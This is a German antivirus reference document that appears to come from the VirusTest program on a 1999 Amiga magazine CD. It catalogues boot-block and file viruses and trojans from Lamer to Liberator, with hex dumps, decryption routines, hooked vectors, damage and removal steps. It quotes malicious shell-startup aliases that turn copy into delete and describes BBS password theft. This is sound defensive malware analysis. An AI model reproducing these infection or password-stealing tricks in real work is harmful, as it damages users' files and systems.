Amiga Plus Special 24

home *** CD-ROM | disk | FTP | other *** search

/ Amiga Plus Special 24 / AMIGAplus Sonderheft 24 (2000)(Falke)(DE)[!].iso / Updates / Virus / VTTest3 / Schutz / VT.Dokumente / VT.kennt_L-Z < prev next >

Wrap

Text File | 1999-11-06 | 420KB | 8,905 lines

VT3.15 kennt_L-Z: ================= (oder sollte erkennen) Stand: 99-02-11 Heiner Schneegold Am Steinert 8 97246 Eibelstadt Deutschland Tel. 09303/99104 (bitte nur 19.00 - 20.00 Uhr) EMail: Heiner.Schneegold@t-online.de - L.A.D.S DoIo, KickTag, KickCheckSum, immer $7F400 versucht eine Taeuschung durch DisplayAlert beim Booten: (Text auch im BB lesbar) L.A.D.S Virus Hunter No virus in memory Press any mouse button Entgegen der Aussage findet KEIN Virustest statt, sondern das eigene Programm wird resetfest installiert. Vermehrung: jeder BB einer Disk OHNE Rueckfrage bei Wert 5 in der Zaehlzelle: veraendert x- und y-Koordinaten bei Mausbewegungen sobald die Zaehlzelle den Wert 8 erreicht: ein Teil des Virusprogramms wird entschluesselt mit eori.b #$41,(a0)+ und mit DisplayAlert ausgegeben: AMIGA COMPUTING Presents: The GREMLIN Virus All Code (c) 1989 By Simon Rockman Hinweis: siehe auch MKV-Filevirus - Labtec-Trojan File Gefunden in: NoCare27.lha NoCare Impl-gepackt Laenge: 13556 Bytes NoCare entpackt Laenge: 28848 Bytes Im entpackten File ist zu lesen: 65206461 792e004c 65742773 20647562 e day..Let's dub 20746869 73206f6e 652c2074 6865204c this one, the L 61627465 63205669 7275732c 206f6b3f abtec Virus, ok? 00733a73 74617274 75702d73 65717565 .s:startup-seque 6e636500 733a6e6f 63617265 00633a6c nce.s:nocare.c:l 6f616477 6200733a 75736572 2d737461 oadwb.s:user-sta 72747570 00733a73 74617274 75706969 rtup.s:startupii 00633a6c 68610063 3a617263 00633a7a .c:lha.c:arc.c:z 6f6f0063 3a656e64 69660073 79733a77 oo.c:endif.sys:w 62737461 72747570 2f766972 75735f63 bstartup/virus_c 6865636b 65720073 79733a77 62737461 hecker.sys:wbsta 72747570 2f766972 75737a00 633a233f rtup/virusz.c:#? 00507265 73732041 4e59204b 65792054 .Press ANY Key T 6f20476f 20426163 6b20546f 20444f53 o Go Back To DOS Keine Vermehrung. Keine verbogenen Vektoren KS1.3 : Aktivierung der Zerstoerungsroutine auf A2000 68000 Chip- und Fastmem nicht gelungen. KS2.04: Abhaengig vom Datum (13.5.) . Das Jahr scheint keine Rolle zu spielen. Die Zerstoerungsroutine konnte mit 1993 und 1994 aktiviert werden. Ablauf: Es werden Files geloescht (Namen s.o.). Das Loeschen des ganzen Unterverzeichnisses C (c:#?) konnte nicht nachvollzogen werden. Danach wird ein Text im Cli ausgegeben: Hi there! It`s probably been awhile since you`ve seen one of these - a virus! usw. Wenn Sie jetzt SOFORT ein Undelete-Prg. aufrufen, werden Sie die verlorenen Files mit grosser Wahrscheinlichkeit zurueck- holen koennen. VT bietet loeschen des Trojan-Files an. - Lame Game Virus BB TimeBomb V1.0 Clone siehe unten Text fuer DisplayAlert: 144a4553 55532120 57686174 2061206c .JESUS! What a l 616d6520 67616d65 21204920 6a757374 ame game! I just 20686164 20746f20 464f524d 41542069 had to FORMAT i 74212121 21210001 00000000 42b90007 t!!!!!......B... - LameBlame! anderer Name: Taipan-LameBlame Cool, DoIo auch KS2.04 BB codiert mit Wert aus $DFF006 Schaeden: Vermehrung mit BB sobald Zaehlzelle 8 erreicht hat: DisplayAlert: LameBlame! by Tai-Pan usw. sonst nichts Herkunft: Virusinstall V2.0 siehe auch: Chaos, Taipan-Chaos, CHEATER HIJACKER, POLISH, - Lamer-Varianten nach VT - mit Kennung - ABCD - bei $392 EOR-Byte an $391 - bei $396 - EOR-Byte an $394 (45fa0350) - EOR-Byte an $395 (45fa0351) - bei $3A6 EOR-Byte an $00D verwendet auch ADD-Byte - bei $3AA EOR-Byte an $3A9 - bei $3AE EOR-Byte an $3AD - bei $3F4 EOR-Byte an $019 verwendet auch ADD-Byte - FEDC - bei $342 EOR-Byte an $341 - ohne Kennung - Lamer-$362-Clist-V. EOR-Wort an $362 Wort, nicht mehr Byte ADD-Wort an $378 - Lamer-$39a EOR-Wort bei $39A Wort, nicht mehr Byte ADD-Wort bei $3B0 - Lamer-$3C2 EOR-Wort bei $3C2 Wort, nicht mehr Byte ADD-Wort bei $3D4 - Lamer-$00D-BB-Virus Kennung ABCD bei $3A6 EOR-Byte bei $00D und $3A5 ADD-Byte bei $3A1 fordert trackdisk.device FastMem ja, BeginIo, KickTag, KickCheckSum, SumKickData Zerstoerung: schreibt Lamer! in irgendeinen Block und da 2 Bytes uebrig bleiben am Schluss noch !!. Im Speicher decodiert mit: ADD.B D1,(A0) EOR.B D0,(A0)+ Im BB ist decodiert zu lesen: 005420fc 4c616d65 .T .Lame 30fc7221 51c8fff4 30bc2121 0.r!Q...0.!! ;.... fffc4e75 74726163 6b646973 6b2e6465 ..Nutrackdisk.de 76696365 00005468 65204c41 4d455220 vice..The LAMER 45787465 726d696e 61746f72 20212121 Exterminator !!! 009d0000 00ffabcd ........ Zerstoerter Block: Block: 1348 4c616d65 72214c61 6d657221 4c616d65 Lamer!Lamer!Lame 72214c61 6d657221 4c616d65 72212121 r!Lamer!Lamer!La ;...... 4c616d65 72214c61 6d657221 4c616d65 Lamer!Lamer!Lame 72214c61 6d657221 4c616d65 72212121 r!Lamer!Lamer!!! Der Block kann NICHT gerettet werden. Ein File, das diesen Block vorher belegt hat, ist VERLOREN ! - LAMER-$019-BB-Virus Kennung ABCD bei $3F4 EOR-Byte bei $019 und $3F3 ADD-Byte bei $3EF fordert trackdisk.device Virus-BB in Block 0 u. 1 Original-BB in Block 2 u. 3 Fastmem ja, BeginIo, KickTag, KickCheckSum, SumKickData Zerstoerung: ein Datenblock (Test auf $8) wird mit AND.B D0,(A0)+ codiert . decodiert mit: ADD.B D1,(A0) EOR.B D0,(A0)+ Im BB ist decodiert zu lesen: 73747261 stra 70007472 61636b64 69736b2e 64657669 p.trackdisk.devi 63650000 54686520 4c414d45 52204578 ce..The LAMER Ex 7465726d 696e6174 6f722021 2121000f terminator !!!.. 00000017 abcd0000 ........ - LAMER-$341-BB-Virus Kennung FEDC bei $342 EOR-Byte bei $341 fordert trackdisk.device Zerstoerung: schreibt LAMER! BeginIo, KickTag, KickCheckSum decodiert mit: EOR.B D0,(A0)+ Im BB ist decodiert zu lesen: 20fc4c41 4d4530fc 522151c8 fff430bc .LAME0.R!Q...0. ;.... 4e757472 61636b64 69736b2e Nutrackdisk. 64657669 63650054 6865204c 414d4552 device.The LAMER 20457874 65726d69 6e61746f 72202121 Exterminator !! 2113fedc !... - Lamer-$362-Clist-V. andere Namen: U.K.LamerStyle oder Lame Style U.K. Diese Namen sind fuer mich nicht nachvollziehbar, waehrend clist im Prg-Code vorkommt (s.u.). Kennung: fehlt EOR-Wort bei $362 Wort, nicht mehr Byte ADD-Wort bei $378 fordert trackdisk.device BeginIo, Kicktag, KickCheckSum Vermehrung: ueber BB Speicher fuer VirusHauptPrg wird ueber StructMemList besorgt und !!!! mit allocabs eingetragen. Springt hinter das Virusteil, um sich zu decodieren. Verwendet A1 statt A0 decodiert mit: EOR.W D0,(A1)+ ($DFF006) ADD.W D1,D0 Im BB ist decodiert zu lesen: 65787061 6e73696f expansio 6e207261 6d007472 61636b64 69736b2e n ram.trackdisk. 64657669 63650000 636c6973 742e6c69 device..clist.li 62726172 7900636c 69737420 33332e38 brary.clist 33.8 30202838 204f6374 20313938 36290d0a 0 (8 Oct 1986).. - LAMER-$391-BB-Virus Kennung ABCD bei $392 EOR-Byte bei $391 fordert trackdisk.device Zerstoerung: schreibt LAMER! FastMem ja, BeginIo, KickTag, KickCheckSum, SumKickData decodiert mit: EOR.B D0,(A0)+ Im BB ist decodiert zu lesen: 00080003 661e303c 005420fc 4c414d45 ....f.0<.T .LAME 30fc5221 51c8fff4 30bc2121 137c0003 0.R!Q...0.!!.|.. ;.... 74726163 6b646973 6b2e6465 trackdisk.de 76696365 00005468 65204c41 4d455220 vice..The LAMER 45787465 726d696e 61746f72 20212121 Exterminator !!! 0009abcd .... - LAMER-$394-BB-Virus Clone: STARCOM 4 siehe unten Kennung ABCD bei $396 EOR-Byte bei $394 ($45fa0350) FastMem ja, BeginIo, KickTag, KickCheckSum und SumKickData Vermehrung: ueber BB Zerstoerung: ueberschreibt einen Block mit 85 x LAMER! und da zwei Bytes uebrig bleiben, dann !! . Die Blocknummer wird mit $DFF006 ermittelt. Speicher fuer VirusHauptPrg wird ueber SysStkLower besorgt. zusaetzlich im Prg. noch Remove Node, Test auf Cool u. Cold . decodiert in den Speicher mit: EOR.B D0,(A0)+ Im BB ist decodiert zu lesen: 20fc4c41 4d4530fc 522151c8 fff430bc .LAME0.R!Q...0. 2121137c !!.| ;.... 74726163 6b646973 trackdis 6b2e6465 76696365 00546865 204c414d k.device.The LAM ^^ 45522045 78746572 6d696e61 746f7220 ER Exterminator 21212100 b100abcd !!!..... - LAMER-$395-BB-Virus Kennung ABCD bei $396 EOR-Byte bei $395 ($45fa0351) FastMem ja, BeginIo, KickTag, KickCheckSum, SumKickData fordert trackdisk.device Zerstoerung: schreibt LAMER! in irgendeinen Block und da 2 Bytes uebrig bleiben am Schluss noch !! decodiert in den Speicher mit: EOR.B D0,(A0)+ Im BB ist decodiert zu lesen: 20fc4c41 4d4530fc 522151c8 fff430bc .LAME0.R!Q...0. 2121137c !!.| ;.... 74726163 6b646973 trackdis 6b2e6465 76696365 00005468 65204c41 k.device..The LA ^^^^ 4d455220 45787465 726d696e 61746f72 MER Exterminator 20212121 007fabcd !!!... - Lamer-39A-BB-Virus andere Namen: Selfwriter, Pseudoselfwriter Diese Namen sind fuer mich nicht nachvollziehbar Kennung: fehlt EOR-Wort bei $39A Wort, nicht mehr Byte ADD-Wort bei $3B0 BeginIo, KickTag, KickCheckSum fordert trackdisk.device Vermehrung: ueber BB Zerstoerung: ueberschreibt einen Block mit 85 x Lamer! und da zwei Bytes uebrig bleiben, dann !! . Die Blocknummer wird mit $DFF007 ermittelt. Speicher fuer VirusHauptPrg wird ueber StructMemList besorgt und !!!! mit allocabs eingetragen. (machen andere Lamer nicht) Springt hinter das Virusteil, um sich zu decodieren. Verwendet A1 statt A0 decodiert mit: EOR.W D0,(A1)+ ($DFF006) ADD.W D1,D0 Im BB ist decodiert zu lesen: 4c616d65 30fc7221 51c8fff4 30bc2121 Lame0.r!Q...0.!! ;.... 74726163 trac 6b646973 6b2e6465 76696365 00005468 kdisk.device..Th 65204c41 4d455220 45787465 726d696e e LAMER Extermin 61746f72 20212121 0000fe85 00000004 ator !!!........ - LAMER-$3A9-BB-Virus Kennung ABCD bei $3AA EOR-Byte bei $3A9 fordert trackdisk.device FastMem ja; BeginIo, KickTag, KickCheckSum und SumKickData Vermehrung: ueber BB Zerstoerung: ueberschreibt einen Block mit 85 x LAMER! und da zwei Bytes uebrig bleiben, dann !! . Die Blocknummer wird mit $DFF006 ermittelt.. Speicher fuer VirusHauptPrg wird ueber SysStkLower besorgt. decodiert mit: EOR.B D0,(A0)+ (immer neu mit $DFF007) Im BB ist decodiert zu lesen: 4c414d45 LAME 30fc5221 51c8fff4 30bc2121 137c0003 0.R!Q...0.!!.|.. ;.... 61636b64 69736b2e 64657669 63650054 ackdisk.device.T 6865204c 414d4552 20457874 65726d69 he LAMER Extermi 6e61746f 72202121 2156abcd nator !!!V.. - LAMER-$3AD-BB-Virus Clone: siehe bei STARCOMReturn Kennung ABCD bei $3AE EOR-Byte bei $3AD fordert trackdisk.device Zerstoerung: schreibt LAMER! BeginIo, KickTag, KickCheckSum und SumKickData Vermehrung: ueber BB KS1.3: ja Fastmem: nein KS2.04: nicht gelungen Zerstoerung: ueberschreibt einen Block mit 85 x LAMER! und da zwei Bytes uebrig bleiben, dann !! . Die Blocknummer wird mit $DFF006 ermittelt. Speicher fuer VirusHauptPrg wird ueber StructMemList besorgt. decodiert mit: EOR.B D0,(A0)+ (immer neu mit $DFF007) Im BB ist decodiert zu lesen: 4c414d45 30fc5221 51c8fff4 30bc2121 LAME0.R!Q...0.!! ;.... 4e757472 61636b64 69736b2e 64657669 Nutrackdisk.devi 63650054 6865204c 414d4552 20457874 ce.The LAMER Ext 65726d69 6e61746f 72202121 218eabcd erminator !!!... - Lamer-$3C2-BB-Virus anderer Name: Rene Dieser Name ist fuer mich nicht nachvollziehbar Kennung: fehlt EOR-Wort bei $3C2 Wort, nicht mehr Byte ADD-Wort bei $3D4 BeginIo, KickTag, KickCheckSum, SumKickData fordert trackdisk.device Vermehrung: ueber BB Zerstoerung: Format alle LW Springt hinter das Virusteil, um sich zu decodieren. decodiert mit: EOR.W D0,(A0)+ ($DFF006) ADD.W D1,D0 Im BB ist decodiert zu lesen: 74726163 6b646973 6b2e6465 trackdisk.de 76696365 00005468 65204c41 4d455220 vice..The LAMER 45787465 726d696e 61746f72 20212121 Exterminator !!! - LamerBBdefekt BB Empfehlung: sofort loeschen Typ A: Immer Guru. BB-CheckSum falsch. In eor-Schleife herumgepfuscht. EOR.B D0,(A0)+ EOR.L D2,D0 (D2 !!!!) Typ B: Immer GURU. Code im BB um mehrere Bytes verschoben. trackdisk. device und LAMER am Schluss zu lesen. Wahrscheinlich gibt noch mehr ???? - Virusx-LAM-$3C2-Ins haengt an VirusX Laenge: 13192 Bytes Wird im Speicher von VT als Lamer-$3C2 erkannt und entfernt. Wichtig: VirusX erkennt Lamer-$3C2 im Speicher NICHT !!!!! Vermehrung: NUR als Lamer-$3C2-Bootblock moeglich, NICHT als Linkfile !!!! Deshalb in FileTest nur Loeschangebot. - Lamer! Exterminator-File gepackt: 2260 Bytes (Zahl stimmt) ungepackt: 1824 Bytes KS2.04: Ja Verbogene Vektoren: siehe oben Tarnung: Fuehrt neben Installierung von Lameralt.BB im Speicher auch den endcli-Befehl (KS1.3) aus. Aenderung gegenueber OrigBefehl: process wird zu task, 2 Werte $52 werden zu $51 Vermehrung: NUR als Lameralt-Bootblock moeglich, NICHT als Linkfile !!!! Da jeder den endcli-Befehl in c hat (KS2.04 nicht mehr), gibt es in FileTest nur Loeschangebot. Danach bitte von OrigWB endcli nach c neu kopieren. VT kennt: 16.10.92 - LAMER-decode Hinweis: Es sind decodierte "Lamer"-Bootbloecke im Umlauf, bei denen Lamer Exterminator im BB zu lesen ist. Diese BBe sind NICHT bootfaehig da ja beim Booten die Codier-Routine ausgefuehrt wird. Es wird dann also Codiert anstatt Decodiert. - Lamer-LoadWB FileVirus Laenge: 4172 Bytes KickTag, KickCheckSum, SumKickData, BeginIo in SubDir c in LoadWB sichtbar: The LAMER Exterminator !!! Virus haengt vor dem LoadWB-Teil Schreibt zuerst das Virusprogramm in den Speicher und fuehrt dann den LoadWB-Befehl aus. Kann sich nicht als LoadWb vermehren, sondern schreibt einen Lamer-BB - Lamer Bomb anderer Name: Gotcha LAMER s.o. - LamerFry-Trojan File Laenge gepackt: 8240 Bytes Bezeichnet sich durch Textausgabe ins Cli selbst als Test-Virus. Aus dem Speicherauszug kann man ersehen, dass es sich um einen Liberator5.0-Clone (Behandlung s.u.) mit geaendertem Text aber gleichem Verhalten handelt. 722e6465 76696365 003a632f 72756e00 r.device.:c/run. 3a632f62 72003a73 2f2e696e 666f2000 :c/br.:s/.info . 3a632f00 732f7374 61727475 702d7365 :c/.s/startup-se 7175656e 63650073 2f736865 6c6c2d73 quence.s/shell-s 74617274 7570003b 4c616d65 72204672 tartup.;Lamer Fr 79202d20 53617973 20596f75 20446965 y - Says You Die 20212121 0a616c69 61732063 6f707920 !!!.alias copy 64656c65 74650a61 6c696173 2064656c delete.alias del 65746520 22656368 6f202a22 4e6f2066 ete "echo *"No f 696c6520 746f2064 656c6574 652c2063 ile to delete, c 616e2774 2066696e 642a2222 00732f2e an't find*"".s/. 696e666f 20002e66 61737464 6972a020 info ..fastdir. 00630063 2f00632f 72756e00 632f6272 .c.c/.c/run.c/br 00627220 633a000a 002e6661 73746469 .br c:....fastdi 72003a73 2f737461 72747570 2d736571 r.:s/startup-seq - LamerKiller File anderer Name: DiVa-SADDAM-Inst. Laenge gepackt: 11512 Bytes KS1.3 Ja KS2.04 GURU3 Verbogene Vektoren: Cold, BeginIo usw. Installiert SADDAM-Disk-Validator (codiert IRAK) Keine Meldung im Cli - Lame Style U.K. siehe bei Clist-Virus - LamerStyle U.K. siehe bei Clist-Virus - Laureline-Virus BB Typ A immer ab $6E800 Typ B immer ab $6B500 (nicht vorhanden) KS1.3 : ja KS2.04: ja Verwendet AllocMem NICHT Fordert trackdisk.device NICHT Verbogenen Vektoren: Cool, Warm, DoIo BB-Teile codiert Namensbegruendung: decodiert mit eor.b d7,(a3)+ ist im BB zu lesen: 00000000 00010000 000000d2 0e546865 .............The 204c6175 72656c69 6e652056 69727573 Laureline Virus 2056312e 30000100 f21e436f 64652062 V1.0.....Code b Schaeden und Vermehrung: BB Meldung: Mit DisplayAlert vorher wird ueberprueft: - rechte Maustaste - Zaehlzelle mind #35 - Laurin-Virus SADDAM-Clone Wird von VT als SADDAM-Clone erkannt. Blocklangwort: $a0a0a0a0 Namensbegruendung: im Speicher ist decodiert zu lesen 74726163 6B646973 6B2E6465 76696365 trackdisk.device 00010820 4C617572 696E2056 69727573 ... Laurin Virus Behandlung: siehe bei SADDAM - Lazarus Diskname KEIN Virus Wird von VT NICHT erkannt. Die Disk war defekt und wurde von einem User mit dem Commodore- Programm diskdoctor behandelt. Bei neueren WB liegt dieses Pro- gramm nicht mehr im C-Verzeichnis. Geruechte behaupten, die Disks waeren danach schlimmer verwuestet als vorher. Meine Empfehlung: Verwenden Sie disksalv2 oder ein aehnliches Programm. Fileauszug aus diskdoctor: 726d6174 202d2053 6f727279 210a0000 rmat - Sorry!... 074c617a 61727573 30556e61 626c6520 .Lazarus0Unable 746f2077 72697465 20746f20 726f6f74 to write to root - le RoLE franz. Name fuer Return of The Lamer Exterminator s.u. - LEVIATHAN-Virus BB und File (Laenge 1056 Bytes) Cool $7F89A nach Reset: DoIo $7FAB4 OldOpenLib $7F8E2 KS1.3 : ja KS2.04 : nach RESET Endlosreset (Computer ausschalten) Fordert trackdisk.device NICHT Namensbegruendung: im BB und im File ist zu lesen: -=- LEVIATHAN -=- Vermehrung und Schaeden: Beim ersten Start des Programms wird nur Cool verbogen. Nach einem Reset werden dann DoIo und OldOpenLib verbogen. Vermehrung als BB: Findet mit verbogenen DoIo statt, wenn ein lesender Zugriff auf Block 880 (nur bei DD-Disk Rootblock) stattfindet. Das Virusteil wird nach $7F000 kopiert und einige NOPs durch den BB-Header ersetzt. Abhilfe: neuen Original-BB mit VT aufkopieren. Vermehrung als File: Findet mit verbogenem OldOpenLib-Vektor immer auf sys: statt. Es wird ein Test auf schon verseucht durchgefuehrt. 79007379 733a732f 73746172 7475702d y.sys:s/startup- 73657175 656e6365 00007379 733a732f sequence..sys:s/ c0000000 03f30000 00000000 00010000 ................ Die erste Zeile der s-seq wird eingefuegt: startup-sequence Original: 636c730a 0a000000 00000000 00000000 cls............. startup-sequence verseucht: 732fc00a 636c730a 0a000000 00000000 s/..cls......... Das Virusprogramm selbst wird nach s mit Namen $C0 kopiert (siehe oben). Laenge des Virusfiles 1056 Bytes. Der File- name ist als Sonderbuchstabe A sichtbar. Abhilfe: Loeschen Sie mit VT das Virusfile in s . Vergessen Sie bitte nicht mit einem Editor, die erste Zeile in der Startup-Sequence zu loeschen. Allgemein: Sowohl mit dem BB als auch mit dem File waren BEIDE Ver- seuchungstypen zu erreichen. Im Virus steckt noch ein codierter Text, der NIE erreicht wird: 005e4611 0a190027 51c8fff8 594f5520 .^F....'Q...YOU 41524520 54484520 4f574e45 52204f46 ARE THE OWNER OF 2041204e 45572047 454e4552 4154494f A NEW GENERATIO 4e204f46 20564952 55532120 49542046 N OF VIRUS! IT F 55434b53 20594f55 52205354 41525455 UCKS YOUR STARTU 502d5345 5155454e 43452120 48415645 P-SEQUENCE! HAVE 2046554e 2e2e2e2e 20000000 FUN.... ... - LHA3.0-Trojan siehe bei CoP-Trojan - LHACHECK-BBS-Trojan Laenge ungepackt: 3836 Bytes Einbruchswerkzeug Keine verbogenen Vektoren Keine Vermehrung Soll nach Text im File (usage): - defekte Lha-Archive erkennen und loeschen - BBS-Adverts anhaengen oder loeschen Im File ist weiter zu lesen: 00322456 45523a20 4c484143 4845434b .2$VER: LHACHECK 20312e31 20283139 2e30322e 39342920 1.1 (19.02.94) 62792042 6c616465 2f4e6f43 7261636b by Blade/NoCrack ;...... 0000474f 442d4642 54522e4c 48410000 ..GOD-FBTR.LHA.. Decodiert mit eor.l d0,(a0)+ kann man dann aber auch noch lesen: 536e6f6f 70446f73 0052414d 3a4d312e SnoopDos.RAM:M1. 44415800 4242533a 55534552 2e444154 DAX.BBS:USER.DAT 41000000 00000000 00000000 00000000 A............... Das Trojan-Teil startet nicht, falls SnoopDos gefunden wird. Es wird dann nur der LHACHECK-Teil ausgefuehrt. VT bietet Loeschen an. Ein Ausbau ist nicht moeglich, da das Trojan-Teil eingearbeitet ist. Besorgen Sie sich bitte das Original-LHACHECK-File, falls es das Teil gibt. - LHAV3-BBS-Trojan File Verlaengert ein File um #848 Bytes Keine verbogenen Vektoren Keine Vermehrungsroutine VT erkennt BBS-Virus vgl. auch 1.Hunk bei Viewtek22-Installer. Da ist das Teil ein paar Bytes laenger. Vermutlich ein Angriff auf FastCall mit bestimmten Files s.u. . VT bietet Ausbau an. Das LHA-Programm meldet sich bei mir im Cli mit V 3.035 1994 . Nach meinem Wissensstand gibt es im Sept. 94 noch gar kein LHA-Version 3 . Auszug aus dem 1.Hunk (ist uncodiert zu lesen): 6c696272 61727900 533a4861 75707450 library.S:HauptP 66616400 55736572 2f537973 4f702f55 fad.User/SysOp/U 73657244 6174656e 00426f78 44617465 serDaten.BoxDate 6e2f426f 78506172 616d6574 65720055 n/BoxParameter.U 7365722f 536e6f6f 70792f2e 494e4445 ser/Snoopy/.INDE 58005573 65722f53 6e6f6f70 792f2e54 X.User/Snoopy/.T 58540041 6273656e 64657220 203a2053 XT.Absender : S 6e6f6f70 790a4265 74726566 66202020 noopy.Betreff Hinweis eines Anwenders (Juli 95) : Danke Aufgrund des vorliegenden Textes, kann man davon ausgehen, dass das Programm folgendes macht: Öffnen von S:Hauptpfad Lesen der ersten Zeile (Pfad von Fastcall). Öffnen der Userdaten vom Sysop und auslesen der Sysoppsw. Öffnen der Boxdaten und auslesen des DOS-Passwortes. Öffnet beim User Snoopy das File .index (Offsetdaten fuer Briefe) und fuegt einen neuen Brief ein. Öffnen des Files .txt (Der Brief selber) und hineinschreiben des Passwortes fuer den Sysop und des DOS-Passwortes. - Liberator virus v1.21 anderer Name: MemCheck s.u. - Liberator Virus V3.0 Laenge: ungepackt 10712 (ich hab nur die un- gepackte Version, deshalb erkennt VT auch nur das ungepackte File !!!) Namensbegruendung: s.u. KS2.04: JA 68030: JA bleibt NICHT im Speicher nach Aenderung von .fastdir . Richtiger Name fuer das File: cv Versucht durch Cli-Ausgabe zu taeuschen: Check Vectors rev 5.1 All Rights Reserved more TUPperware © by Mike Hansell Reset vectors ok, Nothing resident, Trackdisk.device not intercepted, DoIO ok, VBlank ok, dos.library not intercepted. System appears to be free of viruses and trojans! Legt in Wirklichkeit .fastdir an (bei mir auf 3 SCSI-HD in einem Durchlauf). Laenge: 2/3 Bytes . Startwert auf allen Festplatten in .fastdir $310a = 1 Return . Hinweis: .fastdir hat danach im Namen noch 2 leerzeichen ($20) Auszug aus FileheaderBlock: 0 0 0 ............ 13f1 3d5 484 ............ a2e6661 73746469 72202000 ..fastdir . 0 0 0 ............ Schreibt in :s/startup-sequence: cv >NIL: in DH0 bei mir (Auszug): execute s:startup-sequence2 cv >NIL: ;also fast am Schluss !!!! endcli >NIL: DH1 bei mir= Wechselplatte zu der Zeit nicht gemounted in DH2 bei mir (AusZug): LoadWB cv >NIL: ;also fast am Schluss !!!!! EndCLI >NIL: in DH3 bei mir: LoadWB -debug cv >NIL: ;also fast am Schluss !!!!! endcli >NIL: Es wurden ALLE 3 s-seq in EINEM Durchgang veraendert !!!! MUESSEN Sie also nach dem Entfernen des VirusFiles AUCH loeschen Das Virus-File cv wird NICHT kopiert !!! Beim naechsten Start (vgl. s-seq) wird der Wert in .fastdir er- hoeht. Auszug: 0000: 320A 2. spaeter wird .fastfile-Laenge von 2 auf 3 und dann auf 4 Bytes erhoeht. Sobald erreicht ist: 3130300a = #100 wird ein Text ausgegeben: Congratulations your hard disk has been liberated of virus protection!! Hello from the Liberator virus v3.0 - Digital Deviant The anti-anti-virus is here again! Lets play trash the hard disk and ram the disk heads Only hardcore belgian rave can truely liberate the mind! The liberator 15/01/92 Empfehlung: Liberator 3 und .fastdir loeschen . s.-seq in den den Ursprungszustand zuruecksetzen. Hinweis: Durch die Virus-Programmierung kann es passieren, dass nach der Aktivierung Locks auf .fastdir noch bestehen. VirusPrg gibt den lock nicht frei. Diese Gefahr besteht nur, wenn sich das aktive VirusPrg ueber ihre BootDisk (s-seq) gestartet hat. VT meldet dann beim Loeschversuch DOS-Fehler. Entfernen Sie dann bitte die Zeile aus der s-seq und booten Sie neu. Da das VirusPrg nicht mehr aktiviert wird, koennen keine locks mehr entstehen und das Loeschen der Virus-Files MUSS moeglich sein. Fileerkennung mit VT getestet: 18.10.92 - Liberator Virus V5.01 Fundort z.B.: CD-HOTTEST4/aa/2_0/disk2860.dms Laenge: Impl4 7828 Laenge: ungepackt 16924 Weiterentwicklung von V3.0 (sehr viele source-Teile gleich) Der "richtige" Name duerfte PV (s.u.) sein. Liberator-Namensbegruendung s.u. Versucht durch Cli-Ausgabe zu taeuschen: PV(Protect Vectors) v1.02 by Peter Stuer July 22, 1992 FREEWARE Reset vectors ok, Nothing resident, Trackdisk.device not intercepted, DoIO ok, VBlank ok, low interrupts ok, dos.library not intercepted. monitoring vectors... Fully Kickstartv2.xx compatible, stops all viruses, checks disk-validators, Use run to push this program into the background. Die Tests wurden mit df0: und df1: durchgefuehrt. Nach der Cli-Ausgabe wird gesucht und nach df1: kopiert :c/run, :c/br (runback), :s/.info (nach o ein Leerzeichen = $20) .info-Laenge: 4 Bytes, .info-Startinhalt bei mir: $00000064 Hinweis: Sie MUESSEN also neben dem eigentlichen Virusfile auch .info in s loeschen. Kopiert :c/PV . Dabei wird IMMER der letzte Buchstabe des Files zufallsbedingt geaendert (also aus PV wird Pe oder Pb usw.) . Vermutlich um die Erkennung ueber Filenamen unmoeglich zu machen. Auf Disk wurde KEIN .fastdir angelegt. Aendert die s.-seq . (MUESSEN Sie von Hand zuruecksetzen) vorher: cls nach Befall: br c:pe cls Nachtrag 01.12.93: Es liegt jetzt eine komplette Disk (PD-England) vor (mit stars). Dank an den deutschen Zusender. Tests wurden mit HD0: durchgefuehrt. In das Rootverzeichnis wird ".fastdir",A0,20 (4 Bytes) kopiert. Nach S wird ".info",20 (4 Bytes) kopiert. Nach C wird kopiert: - run (2568) bitte loeschen - br (948) bitte loeschen - pvx (7828) wird von VT erkannt Die Aenderung des 3. Buchstaben wurde mehrfach nachvollzogen. Aber es gibt immer noch die alte Disk (s.o.) und falls von dieser Disk der Lib 5.01 aktiviert wird, so wird weiterhin der 2. Buchstabe geaendert !!!! Nachweis: Fileheaderblock Virusteil: alte Version: (Filename immer nur 2 Buchstaben) 01a0: 00000000 000014c8 0000027f 00000491 ............... 01b0: 02706200 00000000 00000000 00000000 .pb............. ^^ 01c0: 00000000 00000000 00000000 00000000 ................ neue (gepackte) Version: (Filename immer 3 Buchstaben) 01a0: 00000000 000016c2 00000408 000000b1 ................ 01b0: 03707678 00000000 00000000 00000000 .pvx............ ^^ 01c0: 00000000 00000000 00000000 00000000 ................ Aenderungen alle Versionen: Aendert die s.-seq.: vorher: ;.... C:SetPatch QUIET C:Version >NIL: ;.... nachher: ;.... C:SetPatch QUIET br c:pvs C:Version >NIL: ;.... d.h. die Zeile wird variabel eingesetzt und nicht immer als 1. Zeile WICHTIG !!!!! WICHTIG !!!!! Aendert die Shell-Startup (falls vorhanden): vorher: ;...... Prompt "%N.%S> " Alias Clear "Echo *"*E[0;0H*E[J*" " Alias XCopy "Copy CLONE " ;...... nachher: ;...... Prompt "%N.%S> " Alias Clear "Echo *"*E[0;0H*E[J*" " Alias XCopy "Copy CLONE " ;liberatorV - controlling me! alias copy delete alias delete "echo *"No file to delete, can't find*"" ;...... MERKE !!!!!! Falls Sie von einem Medium mit dieser Shell-Startup gebootet haben, genuegt es NICHT, nur die Zeilen aus der Shell-Startup zu entfernen und neu abzuspeichern. Durch die Abarbeitung der Shell-Startup wurde im Computer der copy-Befehl bereits durch den delete-Befehl ersetzt. Sie MUESSEN einen Reset ausfuehren, um die Abarbeitung der NEUEN RICHTIGEN Shell-Startup zu er- zwingen !!!!!!!! Das VirusFile enthaelt noch folgenden Text: Congratulations this disk has been liberated of virus protection!! Hello from the Liberator virus v5.01 - Random Disaster The anti-anti-virus is here again! Lets play trash the hard disk and ram the disk heads The piracy curse Liberator V - The future is near. Look out for Liberator VI - The final nightmare ... coming soon from a lame swapper near you! Respect to the virus masters Lamer Exterminator,crime & Contrast. And remember - be excellent to each other! The liberator 27/07/92 Virus Generation : Diesen Text habe ich auf dem Bildschirm im Gegensatz zu Lib 3 NICHT gesehen. Empfehlung: Liberator 5, .info loeschen, s.-seq. UND shell-start- up (falls vorhanden) aendern . Hinweis: Durch die Virus-Programmierung kann es passieren, dass nach der Aktivierung Locks auf s/.info und .fastdir noch bestehen. VirusPrg gibt den lock nicht frei. Diese Gefahr besteht nur, wenn sich das aktive VirusPrg ueber ihre BootDisk (s-seq) gestartet hat. VT meldet dann beim 